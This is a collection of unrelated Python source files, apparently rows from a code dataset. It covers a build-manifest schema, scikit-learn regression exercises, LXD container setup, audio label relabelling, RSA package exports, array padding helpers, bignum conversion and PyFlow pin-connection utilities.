The format for schema version 1.0 is:
schema-version: "1.0"
build:
name: string
version: string
architecture: x64 or arm64
components:
- name: string
repository: URL of git repository
ref: git ref that was built (sha, branch, or tag)
commit_id: The actual git commit ID that was built (i.e. the resolved "ref")
artifacts:
maven:
- maven/relative/path/to/artifact
- ...
plugins:
- plugins/relative/path/to/artifact
- ...
libs:
- libs/relative/path/to/artifact
- ...
- ...
"""
class BuildManifest_1_0(ComponentManifest['BuildManifest_1_0', 'BuildComponents_1_0']):
SCHEMA = {
"build": {
"required": True,
"type": "dict",
"schema": {
"architecture": {"required": True, "type": "string"},
"id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
"schema-version": {"required": True, "type": "string", "allowed": ["1.0"]},
"components": {
"type": "list",
"schema": {
"type": "dict",
"schema": {
"artifacts": {
"type": "dict",
"schema": {
"maven": {"type": "list"},
"plugins": {"type": "list"},
"bundle": {"type": "list"},
"core-plugins": {"type": "list"},
"libs": {"type": "list"},
},
},
"commit_id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"ref": {"required": True, "type": "string"},
"repository": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
},
}
def __init__(self, data: Any):
super().__init__(data)
self.build = self.Build(data["build"])
def __to_dict__(self) -> dict:
return {
"schema-version": "1.0",
"build": self.build.__to_dict__(),
"components": self.components.__to_dict__()
}
class Build:
def __init__(self, data: Any):
self.name = data["name"]
self.version = data["version"]
self.architecture = data["architecture"]
self.id = data["id"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"version": self.version,
"architecture": self.architecture,
"id": self.id
}
class BuildComponents_1_0(Components['BuildComponent_1_0']):
@classmethod
def __create__(self, data: Any) -> 'BuildComponent_1_0':
return BuildComponent_1_0(data)
class BuildComponent_1_0(Component):
def __init__(self, data: Any):
super().__init__(data)
self.repository = data["repository"]
self.ref = data["ref"]
self.commit_id = data["commit_id"]
self.artifacts = data.get("artifacts", {})
self.version = data["version"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"repository": self.repository,
"ref": self.ref,
"commit_id": self.commit_id,
"artifacts": self.artifacts,
"version": self.version,
}
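# Illustrative usage (added sketch; all field values are hypothetical and it is assumed that the
# ComponentManifest base class validates the dict against SCHEMA and builds `components`):
#   manifest = BuildManifest_1_0({
#       "schema-version": "1.0",
#       "build": {"name": "OpenSearch", "version": "1.0.0", "architecture": "x64", "id": "123"},
#       "components": [{"name": "common-utils", "repository": "https://example.org/repo.git",
#                       "ref": "main", "commit_id": "abcdef0", "version": "1.0.0"}],
#   })
#   manifest.build.version  # -> "1.0.0"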
|
py | 1a32e968d8eb39d66e0400a1caac7d06754f89ba | class InputReceiver:
pass
def __init__(self):
pass
def get_input(self):
return input()
|
py | 1a32eb3a689ffa9039d678fb17a9c6fad2a74be1 | # Practical 1
# Load in the California house pricing data and unpack the features and labels
# Import a linear regression model from sklearn
# Fit the model
# Create a fake house's features and predict its price
# Compute the score of the model on the training data
#%%
from sklearn import linear_model
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn import metrics
import numpy as np
#%%
# X, y = datasets.fetch_california_housing(return_X_y=True)
housing_data = datasets.fetch_california_housing()
X = housing_data.data
y = housing_data.target
print(X.shape)
print(y.shape)
print(housing_data.feature_names)
print(housing_data.DESCR)
#%%
model = linear_model.LinearRegression()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3) # test_size is a proportion of the data you are going to split
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.3) # test_size is a proportion of the data you are going to split
print(len(y))
print(f"num samples y_train: {len(y_train)}")
print(f"num samples y_test: {len(y_test)}")
print(f"num samples y_validation: {len(y_validation)}")
print(len(X))
print(f"num samples X_train: {len(X_train)}")
print(f"num samples X_test: {len(X_test)}")
print(f"num samples X_validation: {len(X_validation)}")
# %%
np.random.seed(2)
model.fit(X_train, y_train)
y_train_pred = model.predict(X_train)
y_validation_pred = model.predict(X_validation)
y_test_pred = model.predict(X_test)
train_loss = metrics.mean_squared_error(y_train, y_train_pred)
validation_loss = metrics.mean_squared_error(y_validation, y_validation_pred)
test_loss = metrics.mean_squared_error(y_test, y_test_pred)
train_score = model.score(X_train, y_train)
validation_score = model.score(X_validation, y_validation)
test_score = model.score(X_test, y_test)
print(
f"{model.__class__.__name__}: "
f"Train score: {train_score}"
f"Validation score: {validation_score}"
f"Test score: {test_score}"
)
#%%
X_fake_house = np.array([[ 6.92710000e+00, 1.90000000e+01, 5.53584906e+00,
9.89245283e-01, 1.72300000e+03, 3.63407547e+00,
2.98100000e+01, -1.37660000e+02]])
y_fake_house_pred = model.predict(X_fake_house)
print(y_fake_house_pred)
# %%
# # %%
# PRACTICAL: Access the sklearn parameters
# Fit a linear regression model to the California housing dataset
# Take a look at the docs, and figure out how to print the weights and bias that this model has learnt for the dataset
# Take a look at the docs for the dataset, and
# Discuss: what does this tell you about the importance of each feature?
print(model.coef_)
print(model.intercept_)
print(housing_data.feature_names)
# %%
# PRACTICAL: Visualise the sklearn parameters
# Take a single feature of the housing dataset
# Scatter plot it against the label in an X-Y graph
# Fit a model to that feature
# Plot your predictions on top (as a line, not a scatter)
# Discuss: what do you expect the weight and bias values to be?
# Access the weight and bias from the model and print them
# Were your expectations correct?
from sklearn.datasets import fetch_california_housing
california_housing = fetch_california_housing(as_frame=True)
california_housing.frame.head()
# %%
import matplotlib.pyplot as plt
california_housing.frame['MedInc'].describe()
california_housing.frame['MedHouseVal'].describe()
subset_df = california_housing.frame[['MedInc','MedHouseVal']]
import matplotlib.pyplot as plt
subset_df.hist(figsize=(12, 10), bins=30, edgecolor="black")
plt.subplots_adjust(hspace=0.7, wspace=0.4)
subset_df.plot(kind='scatter', x='MedInc', y='MedHouseVal', alpha=0.1)
# %%
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
model = LinearRegression()
X = subset_df[['MedInc']]
y = subset_df['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
print(model.coef_)
print(model.intercept_)
print(mean_squared_error(y, y_pred))
print(r2_score(y, y_pred)) # Coefficient of determination: 1.0 is the best score
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
# %%
# Draw the loss function
# Fit a linear regression model to predict the house prices from one column of the California house price dataset
# Access the weight and bias from the model
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
# Plot the loss agains the parameter value
# Discuss: does it look how you expect?
california_housing.frame.head()
california_housing.frame['AveRooms'].describe()
X = california_housing.frame[['AveRooms']]
y = california_housing.frame['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
weight = model.coef_
print(weight)
bias = model.intercept_
print(bias)
mse = mean_squared_error(y, y_pred)
print(mse)
r2 = model.score(X, y)  # coefficient of determination (avoid shadowing the imported r2_score)
print(r2)
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xlabel('AveRooms')
plt.ylabel('MedianHouseVal')
plt.show()
#%%
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
MSE = []
weights = []
for i in range(-10,11):
new_weight = weight + i
weights.append(new_weight)
y_new_pred = new_weight * X + bias
mse = mean_squared_error(y, y_new_pred)
MSE.append(mse)
print(MSE)
print(weights)
plt.scatter(weights, MSE , color="black")
plt.xlabel('weights')
plt.ylabel('MSE')
plt.show()
# %%
weight_adjustment = range(-10,10)
# %%
# Practical - classification dataset
# Load in the breast cancer dataset from sklearn
# Find a classification model in sklearn
# Initialise the model
# Fit the model
# Get the score on the training data
# Print a prediction made by the fitted model
from sklearn import datasets
data = datasets.load_breast_cancer()
print(data.keys())
print(data.DESCR)
import pandas as pd
df = pd.DataFrame(data.data, columns=data.feature_names)
df['target'] = data.target
df.head()
df.info()
# %%
# Store the feature data
X = data.data
# store the target data
y = data.target
# split the data using Scikit-Learn's train_test_split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y)
# %%
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors=6)  # k-nearest neighbours classifier
knn.fit(X_train, y_train)
knn.score(X_test, y_test)
# %%
|
py | 1a32ebfc7dcf68df4512f6af8c1b2eca6ea4d456 | from codev.core.installer import Installer
from codev.core.providers.machines.lxd import LXDBaseMachine, LXDMachineSettings
from codev.control.isolation import PrivilegedIsolation
class LXDIsolationSettings(LXDMachineSettings):
@property
def distribution(self):
return self.data.get('distribution', 'ubuntu')
@property
def release(self):
return self.data.get('release', 'xenial')
class LXDIsolation(LXDBaseMachine, PrivilegedIsolation):
provider_name = 'lxd'
settings_class = LXDIsolationSettings
def create(self):
super().create()
# TODO - providers requirements
Installer(executor=self).install_packages(
'lxc',
'python3-pip', 'libffi-dev', 'libssl-dev', # for codev
'python-virtualenv', 'python-dev', 'python3-venv', 'sshpass', # for ansible task
'git', # for git source
'clsync', # for share support
)
self.stop()
self.start()
|
py | 1a32ec1275414457d517acbb0e5126b8f6fdd9ca | from audiomate import annotations
from audiomate.utils import textfile
WILDCARD_COMBINATION = ('**',)
class UnmappedLabelsException(Exception):
def __init__(self, message):
super(UnmappedLabelsException, self).__init__(message)
self.message = message
def relabel(label_list, projections):
"""
Relabel an entire :py:class:`~audiomate.annotations.LabelList` using user-defined projections.
Labels can be renamed, removed or overlapping labels can be flattened to a single label per segment.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
    apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` it is not
required to specify a projection for every single combination of labels.
This method raises a :py:class:`~audiomate.corpus.utils.labellist.UnmappedLabelsException` if a projection for one
or more combinations of labels is not defined.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
audiomate.annotations.LabelList: New label list with remapped labels
Raises:
UnmappedLabelsException: If a projection for one or more combinations of labels is not defined.
Example:
>>> projections = {
... ('a',): 'a',
... ('b',): 'b',
... ('c',): 'c',
... ('a', 'b',): 'a_b',
... ('a', 'b', 'c',): 'a_b_c',
... ('**',): 'b_c',
... }
>>> label_list = annotations.LabelList(labels=[
... annotations.Label('a', 3.2, 4.5),
... annotations.Label('b', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> ll = relabel(label_list, projections)
>>> [l.value for l in ll]
['a', 'a_b', 'a_b_c', 'b_c', 'c']
"""
unmapped_combinations = find_missing_projections(label_list, projections)
if len(unmapped_combinations) > 0:
raise UnmappedLabelsException('Unmapped combinations: {}'.format(unmapped_combinations))
new_labels = []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
label_mapping = projections[combination] if combination in projections else projections[WILDCARD_COMBINATION]
if label_mapping == '':
continue
new_labels.append(annotations.Label(label_mapping, labeled_segment[0], labeled_segment[1]))
return annotations.LabelList(idx=label_list.idx, labels=new_labels)
def find_missing_projections(label_list, projections):
"""
Finds all combinations of labels in `label_list` that are not covered by an entry in the dictionary of
    `projections`. Returns a list containing tuples of uncovered label combinations or an empty list if there are none.
All uncovered label combinations are naturally sorted.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
    apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` it is not
required to specify a projection for every single combination of labels.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
List: List of combinations of labels that are not covered by any projection
Example:
>>> ll = annotations.LabelList(labels=[
... annotations.Label('b', 3.2, 4.5),
... annotations.Label('a', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> find_missing_projections(ll, {('b',): 'new_label'})
[('a', 'b'), ('a', 'b', 'c'), ('a', 'c'), ('c',)]
"""
unmapped_combinations = set()
if WILDCARD_COMBINATION in projections:
return []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
if combination not in projections:
unmapped_combinations.add(combination)
return sorted(unmapped_combinations)
def load_projections(projections_file):
"""
Loads projections defined in the given `projections_file`.
The `projections_file` is expected to be in the following format::
old_label_1 | new_label_1
old_label_1 old_label_2 | new_label_2
old_label_3 |
You can define one projection per line. Each projection starts with a list of one or multiple
old labels (separated by a single whitespace) that are separated from the new label by a pipe
(`|`). In the code above, the segment labeled with `old_label_1` will be labeled with
`new_label_1` after applying the projection. Segments that are labeled with `old_label_1`
**and** `old_label_2` concurrently are relabeled to `new_label_2`. All segments labeled with
`old_label_3` are dropped. Combinations of multiple labels are automatically sorted in natural
order.
Args:
projections_file (str): Path to the file with projections
Returns:
dict: Dictionary where the keys are tuples of labels to project to the key's value
Example:
>>> load_projections('/path/to/projections.txt')
{('b',): 'foo', ('a', 'b'): 'a_b', ('a',): 'bar'}
"""
projections = {}
for parts in textfile.read_separated_lines_generator(projections_file, '|'):
combination = tuple(sorted([label.strip() for label in parts[0].split(' ')]))
new_label = parts[1].strip()
projections[combination] = new_label
return projections
|
py | 1a32ec4f01112308a575d6d8e75134b67b856048 | # -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
"""
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2016-03-26"
__version__ = '3.4.1'
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
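# Illustrative usage (added sketch; 512-bit keys are for demonstration only, not for real use):
#   (pub_key, priv_key) = newkeys(512)
#   crypto = encrypt(b'hello', pub_key)
#   decrypt(crypto, priv_key)  # -> b'hello'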
|
py | 1a32ec989fe324d05c70cbf49f77ba7e9e7c8d69 | from .builder import build_positional_encoding, build_transformer
from .gaussian_target import gaussian_radius, gen_gaussian_target
from .positional_encoding import (LearnedPositionalEncoding,
SinePositionalEncoding)
from .res_layer import ResLayer, SimplifiedBasicBlock
from .transformer import (FFN, DynamicConv, MultiheadAttention, Transformer,
TransformerDecoder, TransformerDecoderLayer,
TransformerEncoder, TransformerEncoderLayer)
from .inverted_residual import InvertedResidual, InvertedResidualV3
from .make_divisible import make_divisible
__all__ = [
'ResLayer', 'gaussian_radius', 'gen_gaussian_target', 'MultiheadAttention',
'FFN', 'TransformerEncoderLayer', 'TransformerEncoder',
'TransformerDecoderLayer', 'TransformerDecoder', 'Transformer',
'build_transformer', 'build_positional_encoding', 'SinePositionalEncoding',
'LearnedPositionalEncoding', 'DynamicConv', 'SimplifiedBasicBlock',
'make_divisible', 'InvertedResidual'
]
|
py | 1a32ed5e10ea5fdd20b457ad31a38f74e5890bb7 | import numpy as np
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size/float(batch_size)))
return [(i*batch_size, min(size, (i+1)*batch_size)) for i in range(0, nb_batch)] # zgwang: starting point of each batch
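# Illustrative example (added sketch): make_batches(10, 4) -> [(0, 4), (4, 8), (8, 10)]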
def pad_2d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
return pad_2d_vals(in_vals, size1, size2, dtype=dtype)
def pad_2d_vals(in_vals, dim1_size, dim2_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
cur_in_vals = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(cur_in_vals): cur_dim2_size = len(cur_in_vals)
out_val[i,:cur_dim2_size] = cur_in_vals[:cur_dim2_size]
return out_val
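# Illustrative example (added sketch): ragged rows are right-padded with zeros, e.g.
#   pad_2d_vals_no_size([[1, 2, 3], [4]]) -> [[1, 2, 3], [4, 0, 0]] (dtype int32)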
def pad_3d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
size3 = 0
for val in in_vals:
cur_size3 = np.max([len(x) for x in val])
if size3<cur_size3: size3 = cur_size3
return pad_3d_vals(in_vals, size1, size2, size3, dtype=dtype)
def pad_3d_vals(in_vals, dim1_size, dim2_size, dim3_size, dtype=np.int32):
# print(in_vals)
out_val = np.zeros((dim1_size, dim2_size, dim3_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
out_val[i, j, :cur_dim3_size] = in_vals_ij[:cur_dim3_size]
return out_val
def pad_4d_vals(in_vals, dim1_size, dim2_size, dim3_size, dim4_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size, dim3_size, dim4_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
for k in range(cur_dim3_size):
in_vals_ijk = in_vals_ij[k]
cur_dim4_size = dim4_size
if cur_dim4_size > len(in_vals_ijk): cur_dim4_size = len(in_vals_ijk)
out_val[i, j, k, :cur_dim4_size] = in_vals_ijk[:cur_dim4_size]
return out_val
def pad_target_labels(in_val, max_length, dtype=np.float32):
batch_size = len(in_val)
out_val = np.zeros((batch_size, max_length), dtype=dtype)
for i in range(batch_size):
for index in in_val[i]:
out_val[i,index] = 1.0
return out_val
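# Illustrative example (added sketch): index lists become multi-hot rows, e.g.
#   pad_target_labels([[0, 2]], 4) -> [[1., 0., 1., 0.]]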
|
py | 1a32ed6014607c0b6e5860a6bbca0898386d5c7b | #
#
# bignum.py
#
# This file is copied from python-filbitlib.
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
"""Bignum routines"""
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
# generic big endian MPI format
def bn_bytes(v, have_ext=False):
ext = 0
if have_ext:
ext = 1
return ((v.bit_length()+7)//8) + ext
def bn2bin(v):
s = bytearray()
i = bn_bytes(v)
while i > 0:
s.append((v >> ((i-1) * 8)) & 0xff)
i -= 1
return s
def bin2bn(s):
l = 0
for ch in s:
l = (l << 8) | ch
return l
def bn2mpi(v):
have_ext = False
if v.bit_length() > 0:
have_ext = (v.bit_length() & 0x07) == 0
neg = False
if v < 0:
neg = True
v = -v
s = struct.pack(b">I", bn_bytes(v, have_ext))
ext = bytearray()
if have_ext:
ext.append(0)
v_bin = bn2bin(v)
if neg:
if have_ext:
ext[0] |= 0x80
else:
v_bin[0] |= 0x80
return s + ext + v_bin
def mpi2bn(s):
if len(s) < 4:
return None
s_size = bytes(s[:4])
v_len = struct.unpack(b">I", s_size)[0]
if len(s) != (v_len + 4):
return None
if v_len == 0:
return 0
v_str = bytearray(s[4:])
neg = False
i = v_str[0]
if i & 0x80:
neg = True
i &= ~0x80
v_str[0] = i
v = bin2bn(v_str)
if neg:
return -v
return v
# filbit-specific little endian format, with implicit size
def mpi2vch(s):
r = s[4:] # strip size
r = r[::-1] # reverse string, converting BE->LE
return r
def bn2vch(v):
return bytes(mpi2vch(bn2mpi(v)))
def vch2mpi(s):
r = struct.pack(b">I", len(s)) # size
r += s[::-1] # reverse string, converting LE->BE
return r
def vch2bn(s):
return mpi2bn(vch2mpi(s))
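# Illustrative round trip (added sketch): bn2vch(0x1234) -> b'\x34\x12' (little endian, implicit
# size), and vch2bn(b'\x34\x12') -> 0x1234.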
|
py | 1a32ed7567f5969792978c0f844fc312aa7a7126 | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""
.. sidebar:: **Common.py**
**Common.py** is a common definitions file. This file is imported in almost all others files of the program
"""
import re
import math
import time
import inspect
import struct
import weakref
try:
from queue import Queue
except:
from Queue import Queue
import uuid
import sys
from nine import IS_PYTHON2, str
if IS_PYTHON2:
from aenum import IntEnum, Flag, auto, Enum
else:
from enum import IntEnum, Flag, auto, Enum
from PyFlow import findPinClassByType
from PyFlow.Core.version import Version
maxint = 2 ** (struct.Struct('i').size * 8 - 1) - 1
FLOAT_RANGE_MIN = 0.1 + (-maxint - 1.0)
FLOAT_RANGE_MAX = maxint + 0.1
INT_RANGE_MIN = -maxint + 0
INT_RANGE_MAX = maxint + 0
DEFAULT_IN_EXEC_NAME = str('inExec')
DEFAULT_OUT_EXEC_NAME = str('outExec')
DEFAULT_WIDGET_VARIANT = str('DefaultWidget')
REF = str('Reference')
def lerp(start, end, alpha):
"""Performs a linear interpolation
>>> start + alpha * (end - start)
:param start: start the value to interpolate from
:param end: end the value to interpolate to
:param alpha: alpha how far to interpolate
:returns: The result of the linear interpolation
"""
return (start + alpha * (end - start))
def GetRangePct(MinValue, MaxValue, Value):
"""Calculates the percentage along a line from **MinValue** to **MaxValue** that value is.
:param MinValue: Minimum Value
:param MaxValue: Maximum Value
:param Value: Input value
:returns: The percentage (from 0.0 to 1.0) between the two values where input value is
"""
return (Value - MinValue) / (MaxValue - MinValue)
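# Illustrative example (added sketch): GetRangePct(0.0, 10.0, 2.5) -> 0.25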
def mapRangeClamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)
"""
ClampedPct = clamp(GetRangePct(InRangeA, InRangeB, Value), 0.0, 1.0)
return lerp(OutRangeA, OutRangeB, ClampedPct)
def mapRangeUnclamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)"""
return lerp(OutRangeA, OutRangeB, GetRangePct(InRangeA, InRangeB, Value))
def sign(x):
"""Returns sign of x. -1 if x is negative, 1 if positive and zero if 0.
>>> x and (1, -1)[x < 0]
"""
return x and (1, -1)[x < 0]
def currentProcessorTime():
if IS_PYTHON2:
return time.clock()
else:
return time.process_time()
def clamp(n, vmin, vmax):
"""Computes the value of the first specified argument clamped to a range defined by the second and third specified arguments
:param n: input Value
:param vmin: MiniMum Value
:param vmax: Maximum Value
:returns: The clamped value of n
"""
return max(min(n, vmax), vmin)
def roundup(x, to):
"""Rounding up to sertain value
>>> roundup(7, 8)
>>> 8
>>> roundup(8, 8)
>>> 8
>>> roundup(9, 8)
>>> 16
:param x: value to round
:param to: value x will be rounded to
:returns: rounded value of x
:rtype: int
"""
return int(math.ceil(x / to)) * to
_currentVersion = Version(sys.version_info.major, sys.version_info.minor, 0)
python32 = Version(3, 2, 0)
if _currentVersion <= python32:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
del list[:]
else:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
list.clear()
def findGoodId(ids):
"""
Finds good minimum unique int from iterable. Starting from 1
:param ids: a collection of occupied ids
:type ids: list|set|tuple
:returns: Unique Id
:rtype: int
"""
if len(ids) == 0:
return 1
ids = sorted(set(ids))
lastID = min(ids)
if lastID > 1:
return 1
for ID in ids:
diff = ID - lastID
if diff > 1:
return lastID + 1
break
lastID = ID
else:
return ID + 1
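# Illustrative examples (added sketch):
#   findGoodId([]) -> 1, findGoodId([2, 5]) -> 1, findGoodId([1, 2, 4]) -> 3, findGoodId([1, 2, 3]) -> 4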
def wrapStringToFunctionDef(functionName, scriptString, kwargs=None):
"""Generates function string which then can be compiled and executed
Example:
::
wrapStringToFunctionDef('test', 'print(a)', {'a': 5})
Will produce following function:
::
def test(a=5):
print(a)
"""
kwargsString = ""
if kwargs is not None:
for argname, argValue in kwargs.items():
if isinstance(argValue, str):
argValue = "'{}'".format(argValue)
kwargsString += "{0}={1}, ".format(argname, argValue)
kwargsString = kwargsString[:-2]
result = "def {0}({1}):\n".format(functionName, kwargsString)
for scriptLine in scriptString.split('\n'):
result += "\t{}".format(scriptLine)
result += '\n'
return result
def cycleCheck(src, dst):
"""Check for cycle connected nodes
:param src: hand side pin
:type src: :class:`PyFlow.Core.PinBase`
:param dst: hand side pin
:type dst: :class:`PyFlow.Core.PinBase`
:returns: True if cycle deleted
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
start = src
if src in dst.affects:
return True
for i in dst.affects:
if cycleCheck(start, i):
return True
return False
def arePinsConnected(src, dst):
"""Checks if two pins are connected
    .. note:: Pins can be passed in any order. If the **src** pin is an input pin (see :py:class:`PyFlow.Core.Common.PinDirection`), they will be swapped
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase`
:returns: True if Pins are connected
:rtype: bool
"""
if src.direction == dst.direction:
return False
if src.owningNode() == dst.owningNode():
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if dst in src.affects and src in dst.affected_by:
return True
return False
def getConnectedPins(pin):
"""Find all connected Pins to input Pin
:param pin: Pin to search connected pins
:type pin: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: Set of connected pins
:rtype: set(:py:class:`PyFlow.Core.PinBase.PinBase`)
"""
result = set()
if pin.direction == PinDirection.Input:
for lhsPin in pin.affected_by:
result.add(lhsPin)
if pin.direction == PinDirection.Output:
for rhsPin in pin.affects:
result.add(rhsPin)
return result
def pinAffects(lhs, rhs):
"""This function for establish dependencies bitween pins
.. warning:: Used internally, users will hardly need this
:param lhs: First pin to connect
:type lhs: :py:class:`PyFlow.Core.PinBase.PinBase`
:param rhs: Second Pin to connect
:type rhs: :py:class:`PyFlow.Core.PinBase.PinBase`
"""
assert(lhs is not rhs), "pin can not affect itself"
lhs.affects.add(rhs)
rhs.affected_by.add(lhs)
def canConnectPins(src, dst):
"""**Very important fundamental function, it checks if connection between two pins is possible**
:param src: Source pin to connect
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: Destination pin to connect
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connection can be made, and False if connection is not possible
:rtype: bool
"""
if src is None or dst is None:
return False
if src.direction == dst.direction:
return False
if arePinsConnected(src, dst):
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if cycleCheck(src, dst):
return False
if src.isExec() and dst.isExec():
return True
if not src.isArray() and dst.isArray():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not src.canChangeStructure(dst._currStructure, []):
return False
if not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
if not src.canChangeStructure(dst._currStructure, [], selfCheck=False):
return False
if not src.isDict() and dst.isDict():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not (src.canChangeStructure(dst._currStructure, []) or dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
return False
elif not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.optionEnabled(PinOptions.SupportsOnlyArrays) and not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
return False
else:
DictElement = src.getDictElementNode([])
dictNode = dst.getDictNode([])
nodeFree = False
if dictNode:
nodeFree = dictNode.KeyType.checkFree([])
if DictElement:
if not DictElement.key.checkFree([]) and not nodeFree:
if dst._data.keyType != DictElement.key.dataType:
return False
if src.isArray() and not dst.isArray():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.ArraySupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if src.isDict() and not dst.isDict():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.DictSupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections) and dst.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
